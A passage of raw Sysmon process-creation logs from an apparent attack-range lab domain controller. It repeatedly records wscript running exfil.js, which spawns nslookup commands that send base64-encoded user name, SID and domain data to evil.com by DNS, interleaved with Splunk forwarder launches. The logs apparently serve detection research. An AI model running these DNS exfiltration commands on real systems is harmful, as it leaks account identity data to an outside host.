154100x800000000000000075522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:34:10.532{A8622C2F-5CF2-6078-CD0F-00000000AE01}5424C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CF2-6078-CB0F-00000000AE01}5516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcqrg.tmp 2>&1 154100x800000000000000075511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:34:10.502{A8622C2F-5CF2-6078-CB0F-00000000AE01}5516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcqrg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:52.899{A8622C2F-5CE0-6078-CA0F-00000000AE01}6460C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe 
-timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CE0-6078-C80F-00000000AE01}3912C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfnlh.tmp 2>&1 154100x800000000000000075429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:52.870{A8622C2F-5CE0-6078-C80F-00000000AE01}3912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfnlh.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075379Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:40.448{A8622C2F-5CD4-6078-C70F-00000000AE01}828C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CD4-6078-C50F-00000000AE01}5988C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluss.tmp 2>&1 154100x800000000000000075368Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:40.418{A8622C2F-5CD4-6078-C50F-00000000AE01}5988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluss.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075304Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:25.383{A8622C2F-5CC5-6078-C40F-00000000AE01}4772C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CC5-6078-C20F-00000000AE01}6460C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjgav.tmp 2>&1 154100x800000000000000075293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:25.353{A8622C2F-5CC5-6078-C20F-00000000AE01}6460C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjgav.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075272Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:22.824{A8622C2F-5CC2-6078-C10F-00000000AE01}5800C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CC2-6078-BF0F-00000000AE01}6464C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrgddvi.tmp 2>&1 154100x800000000000000075261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:22.795{A8622C2F-5CC2-6078-BF0F-00000000AE01}6464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrgddvi.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:21.979{A8622C2F-5CC1-6078-BE0F-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:20.660{A8622C2F-5CC0-6078-BD0F-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:19.991{A8622C2F-5CBF-6078-BC0F-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:19.325{A8622C2F-5CBF-6078-BB0F-00000000AE01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075194Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:17.546{A8622C2F-5CBD-6078-BA0F-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:16.879{A8622C2F-5CBC-6078-B90F-00000000AE01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000075170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:16.259{A8622C2F-5CBC-6078-B80F-00000000AE01}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:07.754{A8622C2F-5CB3-6078-B70F-00000000AE01}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CB3-6078-B50F-00000000AE01}6696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlorio.tmp 2>&1 154100x800000000000000075128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:07.725{A8622C2F-5CB3-6078-B50F-00000000AE01}6696C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlorio.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075073Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:55.298{A8622C2F-5CA7-6078-B40F-00000000AE01}5392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CA7-6078-B20F-00000000AE01}4268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsixgp.tmp 2>&1 154100x800000000000000075062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:55.269{A8622C2F-5CA7-6078-B20F-00000000AE01}4268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > 
C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsixgp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:37.674{A8622C2F-5C95-6078-B10F-00000000AE01}6128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C95-6078-AF0F-00000000AE01}4408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiw.tmp 2>&1 154100x800000000000000074931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:37.644{A8622C2F-5C95-6078-AF0F-00000000AE01}4408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiw.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:25.207{A8622C2F-5C89-6078-AE0F-00000000AE01}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C89-6078-AC0F-00000000AE01}4420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzogs.tmp 2>&1 154100x800000000000000074835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:25.178{A8622C2F-5C89-6078-AC0F-00000000AE01}4420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzogs.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:22.010{A8622C2F-5C86-6078-AB0F-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:20.488{A8622C2F-5C84-6078-AA0F-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000074790Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:19.835{A8622C2F-5C83-6078-A90F-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074778Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:19.308{A8622C2F-5C83-6078-A80F-00000000AE01}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074765Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:17.569{A8622C2F-5C81-6078-A70F-00000000AE01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
